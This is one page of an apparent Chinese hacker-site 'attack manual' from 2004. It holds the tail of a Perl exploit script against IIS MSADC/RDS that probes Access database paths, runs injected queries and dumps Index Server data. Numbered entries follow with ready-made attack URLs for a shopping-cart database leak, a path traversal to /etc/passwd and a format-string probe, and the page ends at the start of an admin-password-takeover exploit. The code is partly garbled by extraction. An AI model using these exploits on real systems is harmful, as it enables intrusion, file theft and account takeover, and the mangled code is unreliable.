 |
  |
|
| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 | | ||||
 |
|
|||||||
|
||||||||
|
|||||
| 网络程序攻击手册 | |||||
作者:未知 文章来源:CnXHacker.Net 点击数: 更新时间:2004-11-7  |
|||||
|
$reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw(make_header() . make_req(5,$in,"")); my $temp= odbc_error(@results); verbose($temp); return 1 if ($temp=~/Microsoft Access/); return 0;} ############################################################################## sub run_query { my ($in)=@_; $reqlen=length( make_req(3,$in,"") ) - 28; $reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw(make_header() . make_req(3,$in,"")); return 1 if rdo_success(@results); my $temp= odbc_error(@results); verbose($temp); return 0;} ############################################################################## sub known_mdb { my @drives=("c","d","e","f","g"); my @dirs=("winnt","winnt35","winnt351","win","windows"); my $dir, $drive, $mdb; my $drv="driver={Microsoft Access Driver (*.mdb)}; dbq="; # this is sparse, because I don't know of many my @sysmdbs=( "\catroot\icatalog.mdb", "\help\iishelp\iis\htm\tutorial\eecustmr.mdb", "\system32\certmdb.mdb", "\system32\certlog\certsrv.mdb" ); #these are %systemroot% my @mdbs=( "\cfusion\cfapps\cfappman\data\applications.mdb", "\cfusion\cfapps\forums\forums_.mdb", "\cfusion\cfapps\forums\data\forums.mdb", "\cfusion\cfapps\security\realm_.mdb", "\cfusion\cfapps\security\data\realm.mdb", "\cfusion\database\cfexamples.mdb", "\cfusion\database\cfsnippets.mdb", "\inetpub\iissamples\sdk\asp\database\authors.mdb", "\progra~1\common~1\system\msadc\samples\advworks.mdb", "\cfusion\brighttiger\database\cleam.mdb", "\cfusion\database\smpolicy.mdb", "\cfusion\databasecypress.mdb", "\progra~1\ableco~1\ablecommerce\databases\acb2_main1.mdb", "\website\cgi-win\dbsample.mdb", "\perl\prk\bookexamples\modsamp\database\contact.mdb", "\perl\prk\bookexamples\utilsamp\data\access\prk.mdb" ); #these are just foreach $drive (@drives) { foreach $dir (@dirs){ foreach $mdb (@sysmdbs) { print "."; if(create_table($drv . $drive . ":\" . $dir . $mdb)){ print "n" . $drive . ":\" . $dir . $mdb . " successfuln"; if(run_query($drv . $drive . ":\" . $dir . $mdb)){ print "Success!n"; save (4,4,$drive . ":\" . $dir . $mdb,""); exit; } else { print "Something's borked. Use verbose next timen"; ]]} foreach $drive (@drives) { foreach $mdb (@mdbs) { print "."; if(create_table($drv . $drive . $dir . $mdb)){ print "n" . $drive . $dir . $mdb . " successfuln"; if(run_query($drv . $drive . $dir . $mdb)){ print "Success!n"; save (4,4,$drive . $dir . $mdb,""); exit; } else { print "Something's borked. Use verbose next timen"; ]] } ############################################################################## sub hork_idx { print "nAttempting to dump Index Server tables...n"; print " NOTE: Sometimes this takes a while, other times it stallsnn"; $reqlen=length( make_req(4,"","") ) - 28; $reqlenlen=length( "$reqlen" ); $clen= 206 + $reqlenlen + $reqlen; my @results=sendraw2(make_header() . make_req(4,"","")); if (rdo_success(@results)){ my $max=@results; my $c; my %d; for($c=19; $c<$max; $c++){ $results[$c]=~s/x00//g; $results[$c]=~s/[^a-zA-Z0-9:~ \._]/n/g; $results[$c]=~s/[^a-zA-Z0-9:~ \._n]//g; $results[$c]=~/([a-zA-Z]:\)([a-zA-Z0-9 _~\]+)\/; $d="";} foreach $c (keys %d){ print "$cn"; } } else {print "Index server doesn't seem to be installed.n"; ] ############################################################################## sub dsn_dict { open(IN, "<$args") || die("Can't open external dictionaryn"); while(<IN>){ $hold=$_; $hold=~s/[rn]//g; $dSn="$hold"; print "."; next if (!is_access("DSN=$dSn")); if(create_table("DSN=$dSn")){ print "$dSn successfuln"; if(run_query("DSN=$dSn")){ print "Success!n"; save (3,3,"DSN=$dSn",""); exit; } else { print "Something's borked. Use verbose next timen";]} print "n"; close(IN);} ############################################################################## sub sendraw2 {# ripped and modded from whisker sleep($delay); # it's a DoS on the server! At least on mine... my ($pstr)=@_; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problemsn"); if(connect(S,pack "SnA4x8",2,80,$target)){ print "Connected. Getting data"; open(OUT,">raw.out"); my @in; select(S); $|=1;print $pstr; while(<S>){ print OUT $_; push @in, $_; print STDOUT ".";} close(OUT); select(STDOUT); close(S); return @in; } else { die("Can't connect...n"); ] ############################################################################## sub content_start { # this will take in the server headers my (@in)=@_; my $c; for ($c=1;$c<500;$c++) { if($in[$c] =~/^x0dx0a/){ if ($in[$c+1]=~/^HTTP/1.[01] [12]00/) { $c++; } else { return $c+1; ]} return -1;} # it should never get here actually ############################################################################## sub funky { my (@in)=@_; my $error=odbc_error(@in); if($error=~/ADO could not find the specified provider/){ print "nServer returned an ADO miscofiguration messagenAborting.n"; exit;} if($error=~/A Handler is required/){ print "nServer has custom handler filters (they most likely are patched)n"; exit;} if($error=~/specified Handler has denied Access/){ print "nServer has custom handler filters (they most likely are patched)n"; exit;] ############################################################################## sub has_msadc { my @results=sendraw("GET /msadc/msadcs.dll HTTP/1.0nn"); my $base=content_start(@results); return 1 if($results[$base]=~/Content-Type: application/x-varg/); return 0;} ######################## 四十四. SmartWin CyberOffice Shopping Cart Smartwin Technology CyberOffice Shopping Cart是一种购物车应用程序,它被用在那些运行Windows NT 4.0或2000系统、允许进行电子商务交易的网站上。远程用户可能读取运行有Smartwin Technology CyberOffice Shopping Cart 2.0的网站的_private目录。默认情况下任何人对_private目录都有读权限。 攻击:http://target/_private/shopping_cart.mdb 四十五. Moreover.com CGI 文件泄露漏洞 新闻服务商Moreover.com 提供的catched_feed.cgi V1.0的脚本存在这样一个漏洞;这个脚本有获得文件 的功能,本来是用来返回一个指定文件的内容给浏览器,可是由于没有在用户输入的字符串中过滤".."字符串,所以通过构造一个URL,提交给这个脚本,可以获得CGI脚本不允许的文件内容,必须保证这个文件是HTTP用户可以读的; 攻击:http://victim/cgi-bin/cached_feed.cgi?../../../.+/etc/passwd 四十六. Unixware SCOhelp CGI程序格式串漏洞 SCO Unixware 7 缺省安装时会包含sochelp组件。这是一个监听在tcp 457端口的HTTP服务器,允许用户访问帮助手册以及其他的一些文档。它的一个用来完成搜索功能的CGI程序存在一个格式串漏洞,允许远程用户在主机上执行任意代码。尽管攻击者只能得到'nobody'用户权限(缺省状态下),仍然会给用户非法访问主机系统的机会,他可能进一步获取更高权限。 攻击:http://target:457/search97cgi/vtopic?Action=FilterSearch&filter=&queryText=%25x 可以让服务器产生下列响应: -- Internal error: STR_sprintf: Invalid format (Error E1-0142 (Query Builder): Invalid character '%' (0x25)) Result Search failed: -40 Result Error E1-0142 (Query Builder): Invalid character ' Result Error E1-0130 (Query Builder): Syntax error in query string near character 1 Result Error E1-0133 (Query Builder): Error parsing query: 81887e0 Result VdkSearchNew failed, error -40 Result Request failed for REQUEST_METHOD=, QUERY_STRING= Component Component (vsearch) failed in processing request, -2 Action Action (FilterSearch) failed while processing request in component (vsearch), -2 Service Manager Action (FilterSearch) failed in processing request, -2 S97IS Service manager failed to process request 四十七. Subscribe Me LITE 更改管理员口令漏洞 任何远程用户都能修改CGI Script Centers' Subscribe Me Lite的管理员口令。这使得远程用户拥有完全的管理权限,包括从邮件列表中增加和删除用户。 攻击: #!/usr/bin/perl -w ## Subscribe Me Lite 2.0 exploit / www.cgiscriptcenter.com ## This exploits changes the administrator password and ## let's anyone take over the mailing list. You can send ## bogus e-mail to everyone on the list. ## ## May work on earlier versions, but not sure - not sure ## if it will work on the Professional version either. ## ## teleh0r@doglover.com / anno 2000 ## httpd://teleh0r.cjb.net use strict; use Socket; if (@ARGV < 2) { 上一页 [1] [2] [3] [4] [5] [6] 下一页 |
|||||
| 文章录入:IceRiver 责任编辑:IceRiver | |||||
| 【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 | |||||
| 最新热点 | 最新推荐 | 相关文章 | ||
| XSS漏洞另一个攻击趋势 “伪颗粒”变种后台秘密监视 灰鸽子变种NH远程控制用户偷 06月27日病毒播报 Data URI XSS与验证About XH 微软将超1亿收购语义搜索Pow 近期警惕:黑客利用高考查分 "木马点击器"泛滥 点击欺诈威 XP获死缓两年 Vista全面推广 卖场现200元电脑 低价二手电 |
 网友评论:(只显示最新5条。评论内容只代表网友观点,与本站立场无关!) |
 |
|
| 关于我们 - 版权声明 - 帮助(?) - 广告服务 - 联系我们 - 友情链接 - 用户注册 - | Powered by ICE RIVER - STUDIO |
|
|
| » CnXHacker.CoM |  |
© CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved. |
